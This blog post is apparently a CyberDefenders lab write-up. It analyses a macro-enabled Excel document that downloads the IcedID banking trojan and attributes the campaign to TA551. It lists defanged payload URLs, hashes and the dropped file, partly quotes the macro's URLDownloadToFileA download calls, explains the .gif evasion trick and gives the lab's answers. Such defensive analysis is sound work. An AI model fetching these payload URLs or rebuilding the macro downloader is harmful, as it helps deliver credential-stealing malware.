Post

Threat Intelligence Analysis: IcedID — Tracking a Macro-Enabled Document Delivery Chain

Posted
By El OMARI Zakaria
8 min read
Threat Intelligence Analysis: IcedID — Tracking a Macro-Enabled Document Delivery Chain

Platform: CyberDefenders Challenge: IcedID Category: Threat Intelligence Difficulty: Easy Tools: VirusTotal, Malpedia, X (Twitter), Tria.ge, ANY.RUN Achievement: Proof of Completion

1. Executive Summary

Incident Type: Malware Delivery / Banking Trojan / Threat Intelligence Pivot

Malware Family: IcedID (BokBot)

A suspicious file was flagged during threat intelligence triage. Using open-source threat intelligence platforms — VirusTotal, Tria.ge, Malpedia, and ANY.RUN — the investigation confirmed the file as a macro-enabled Excel document weaponized with XLM 4.0 macros. The document serves as a first-stage loader for the IcedID (also known as BokBot) banking trojan. The delivery infrastructure utilizes multiple compromised domains serving payloads disguised as GIF files, and the campaign is attributed to the financially motivated threat group TA551 (also tracked as GOLD CABIN / Shathak).

Indicators of Compromise (IOCs)

TypeIndicatorDescription
Malware Hash (SHA-1)191eda0c539d284b29efe556abb05cd75a9077a0Initial hash submitted for analysis
Malware Hash (SHA-256)d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116dFull SHA-256 of the malicious XLSX
File Namedocument-1982481273.xlsmSocial-engineered document filename
Payload URL (1)metaflip[.]io/ds/3003.gifXLM macro payload download URL
Payload URL (2)partsapp[.]com[.]br/ds/3003.gifRedundant payload download URL
Payload URL (3)columbia[.]aula-web[.]net/ds/3003.gifRedundant payload download URL
Payload URL (4)tajushariya[.]com/ds/3003.gifRedundant payload download URL
Payload URL (5)agenbolatermurah[.]com/ds/3003.gifRedundant payload download URL
Dropped Fileksjvoefv.skdRenamed payload dropped to disk
Domain RegistrarNameCheap, Inc.Registrar used for C2 domain infrastructure
Threat GroupTA551 (G0127) / GOLD CABIN / ShathakAttribution via MITRE ATT&CK
Macro LanguageXLM 4.0Legacy Excel macro language used for evasion

MITRE ATT&CK Mapping Overview

TacticTechniqueID
Initial AccessPhishing: Spearphishing AttachmentT1566.001
ExecutionUser Execution: Malicious FileT1204.002
ExecutionCommand and Scripting Interpreter: XLM MacrosT1059
Defense EvasionMasquerading: Match Legitimate Name (.gif extension)T1036.005
Defense EvasionObfuscated Files or InformationT1027
Command & ControlIngress Tool TransferT1105

2. Background: The IcedID Delivery Model

IcedID (also known as BokBot) is a modular banking trojan that first emerged in 2017. While originally designed for credential theft and web injection against financial institutions, it has evolved into a versatile initial access broker — frequently delivering secondary payloads like Cobalt Strike, Conti ransomware, and other post-exploitation frameworks.

ComponentDescriptionForensic Significance
XLM 4.0 MacrosLegacy Excel macro language predating VBAEvades many modern AV/EDR solutions that focus on VBA analysis
Staged Payload DownloadMultiple redundant URLs serving the same payloadEnsures delivery even if individual domains are blocked
.gif Extension MasqueradingPayloads served with image file extensionsBypasses file-type-based web proxies and URL filters
TA551 / ShathakFinancially motivated threat group (MITRE G0127)Known for high-volume email campaigns distributing IcedID and other loaders

Why This Matters: IcedID’s use of XLM 4.0 macros instead of modern VBA is a deliberate evasion technique. Many security tools and sandboxes focus their macro analysis on VBA, leaving XLM macros — a 30-year-old technology — as a blind spot. Analysts must ensure their analysis tools support XLM macro extraction (e.g., olevba, XLMMacroDeobfuscator).

3. Phase 1: Initial Sample Triage — VirusTotal Analysis (Questions 1–4)

Objective: Identify the malware family, file type, threat labels, and delivery filenames using VirusTotal.

The investigation begins with the provided SHA-1 hash 191eda0c539d284b29efe556abb05cd75a9077a0. Submitting this hash to VirusTotal immediately reveals the sample’s reputation and classification.

VirusTotal detection page showing 44 out of 65 security vendors flagging the file as malicious. The SHA-256 hash is d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d. The file is 105.53 KB in XLSX format. Popular threat label is trojan.x97m/docdl. Threat categories show trojan and downloader. Family labels include x97m, docdl, and icedid.

Key findings from VirusTotal:

  • 44/65 vendors flag the file as malicious — extremely high consensus
  • Popular threat label: trojan.x97m/docdl — the x97m prefix indicates Excel macro content
  • Family labels: x97m, docdl, icedid — confirming this is an IcedID downloader
  • File size: 105.53 KB — small enough to evade size-based email filters

The Details tab reveals the various filenames this sample has been observed under:

VirusTotal Names section showing five filenames associated with this hash: the full SHA-256 as .xlsx, sample_04.xlsx, 717.xlsx, and document-1982481273.xlsm — the last filename highlighted as the social-engineered delivery name.

The filename document-1982481273.xlsm is a classic social engineering pattern — a generic “document” prefix followed by a random number, designed to look like an auto-generated file from a legitimate business system (e.g., invoice processing, document management).

Identifying Dropped Files

The Behavior tab in VirusTotal reveals the files dropped to disk when the macro executes:

VirusTotal Behavior tab showing Files Dropped section with GUIDs (31AC010A..., D8B36893...) and the key dropped file at c:\users\xxx\ksjvoefv.skd, alongside cached .gif files in the INetCache directory.

The macro downloads payloads disguised as .gif files (cached in inetcache\ie\) and renames them to .skd files on disk. The filename ksjvoefv.skd is the final payload dropped to the user’s profile directory — a randomized name with a non-standard extension designed to avoid detection by filename-based rules.

Answer Q1

What is the malware family classification for the file?

IcedID

Answer Q2

What is the file type of the malicious sample?

xlsx

Answer Q3

What is the document file name used for social engineering?

document-1982481273.xlsm

Answer Q4

What is the name of the file dropped to disk?

ksjvoefv.skd

4. Phase 2: Infrastructure Analysis — Contacted URLs & Download Chain (Questions 5 & 6)

Objective: Map the download infrastructure used by the macro to retrieve the IcedID payload.

The Relations tab in VirusTotal reveals the external URLs the macro contacts when executed. This provides a complete picture of the attacker’s delivery infrastructure:

VirusTotal Contacted URLs section showing 8 URLs. Multiple domains serve the same pathds/3003.gif including metaflip.io, partsapp.com.br, columbia.aula-web.net, tajushariya.com, and agenbolatermurah.com. Detection ratios range from 10/91 to 14/93. Two legitimate URLs (aws.amazon.com and x1.i.lencr.org) appear as noise.

Five different compromised domains all serve the same payload path (/ds/3003.gif), providing redundancy — if one domain is taken down, the macro simply falls back to the next URL in the CALL sequence. The .gif extension is a deliberate masquerade: these are not image files but rather the IcedID DLL payload renamed to bypass URL filtering rules that block executable downloads.

Sandbox Confirmation via Tria.ge

Cross-referencing the sample on Tria.ge (Recorded Future Sandbox) confirms the XLM macro source code and the exact download CALL sequence:

Tria.ge sandbox analysis overview showing the sample document-971744317.xlsm scored 10/10 (maximum maliciousness). Tags include ICEDID, BANKER, LOADER, MACRO, TROJAN, XLM. The Malware Config section shows extracted XLM 4.0 source code with five sequential CALL("URLMon", "URLDownloadToFileA") instructions downloading from each compromised domain to .skd files.

The extracted XLM macro source confirms the delivery mechanism:

  1. CALL("URLMon", "URLDownloadToFileA") — Uses the Windows URLMon COM object to download files
  2. Each call targets a different compromised domain with the same path /ds/3003.gif
  3. Downloaded files are saved locally as ..\ksjvoefv.skd, ..\ksjvoefv.skd1, ..\ksjvoefv.skd2, etc.

Analyst Note: The use of URLDownloadToFileA from XLM macros is a well-known technique. Detection engineers should create Sigma/YARA rules targeting Excel processes (excel.exe) making outbound HTTP connections via urlmon.dll — this is almost never legitimate in an enterprise environment.

Answer Q5

How many URLs did the malware contact?

8

Answer Q6

What is the registrar used for the domain infrastructure?

NameCheap, Inc.

5. Phase 3: Threat Attribution — MITRE ATT&CK & Malpedia (Questions 7 & 8)

Objective: Attribute the campaign to a known threat actor using open-source threat intelligence frameworks.

WHOIS Pivot on C2 Domains

Examining the WHOIS history for one of the payload domains (tajushariya.com) reveals consistent registration through NameCheap, Inc. — a registrar frequently used by threat actors due to its low cost and minimal verification requirements:

![Historical WHOIS lookups for tajushariya.com showing 27 records. The registrar is consistently NAMECHEAP INCNameCheap, Inc. across all entries dating back to 2023. Registrant IDs alternate between 12dab2e482f2c209 (IS) and 3b5f76ecd769308f (US).](/assets/IcedID%20Lab/Pasted%20image%2020260618235208.png)

Threat Actor Attribution via Malpedia & MITRE ATT&CK

Pivoting to Malpedia and the MITRE ATT&CK framework, IcedID is cataloged as software S0483. The “Groups That Use This Software” section directly links IcedID to two threat groups:

MITRE ATT&CK software page for IcedID showing the "Groups That Use This Software" table. Two entries: G0127 (TA551) and G1038 (TA578).

TA551 (MITRE ID: G0127, also known as GOLD CABIN and Shathak) is a financially motivated threat group active since at least 2018. They are known for high-volume email-based malware distribution campaigns targeting English, German, Italian, and Japanese speakers.

Malpedia page for TA551 (MITRE G0127) showing the group profile: financially-motivated threat group active since at least 2018, primarily targeting English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. Associated groups listed as GOLD CABIN and Shathak. Created 19 March 2021, last modified 16 April 2025.

Answer Q7

What threat group is associated with IcedID distribution?

TA551

Answer Q8

What is the MITRE ATT&CK group ID for the associated threat actor?

G0127

6. Reconstructed Attack Flow

Based on the multi-platform threat intelligence analysis, we can reconstruct the complete IcedID delivery chain:

StepKill Chain PhaseActionEvidence Source
1WeaponizationTA551 creates document-1982481273.xlsm with embedded XLM 4.0 macrosTria.ge macro extraction
2DeliveryDocument delivered via spearphishing email attachmentTA551 known TTP (Malpedia)
3ExploitationVictim opens document and enables macrosUser execution required
4InstallationXLM macro calls URLDownloadToFileA to download 3003.gif from 5 redundant domainsVirusTotal Contacted URLs
5InstallationPayload saved as ksjvoefv.skd in user profile directoryVirusTotal Behavior → Dropped Files
6C2IcedID DLL loaded, begins C2 communication for banking credential theftIcedID known behavior (Malpedia)

Key Observation: The attack chain relies entirely on social engineering — there are no software exploits involved. The XLM macro only executes if the user manually clicks “Enable Content.” However, the 44/65 VirusTotal detection rate means many enterprise AV solutions do detect this sample. The real danger lies in campaigns using fresher variants with lower detection rates, delivered within hours of compilation before AV signatures are updated.

7. Conclusion

The IcedID investigation demonstrates a complete threat intelligence workflow — from hash submission to threat actor attribution. Key findings:

  1. Malware Family: IcedID (BokBot) banking trojan, delivered via a macro-enabled Excel document (document-1982481273.xlsm).
  2. Evasion Technique: XLM 4.0 macros used instead of VBA to evade modern macro analysis tools.
  3. Delivery Infrastructure: Five compromised domains serving identical payloads at /ds/3003.gif with .gif extension masquerading.
  4. Attribution: Campaign attributed to TA551 (G0127 / GOLD CABIN / Shathak) — a prolific financially motivated threat group.
  5. Registrar Pattern: All C2 domains registered through NameCheap, Inc.

Key Takeaways for the SOC:

  1. Block the identified payload URLs and their parent domains at the web proxy and DNS sinkhole level. Add all 5 compromised domains to the blocklist immediately.
  2. Deploy XLM macro detection rules — many organizations disable VBA macros via Group Policy but forget that XLM 4.0 macros are a separate, older technology that must be disabled independently (Excel > Trust Center > Macro Settings > Disable Excel 4.0 macros).
  3. Hunt for urlmon.dll activity from Office processes — Sigma rules detecting excel.exe or winword.exe loading urlmon.dll and making outbound HTTP connections are a reliable detection for macro-based downloaders.
  4. Monitor for NameCheap-registered domains in newly observed DNS queries — while NameCheap is legitimate, its prevalence in threat actor infrastructure makes it a useful enrichment signal when combined with other indicators.

Analysis Date: June 21, 2026 Analyst: El OMARI Zakaria

CTF Write-ups, Threat Intelligence, Malware Analysis
cyberdefenders icedid threat-intel virustotal triage malpedia xlm-macro ta551 osint banking-trojan
This post is licensed under CC BY 4.0 by the author.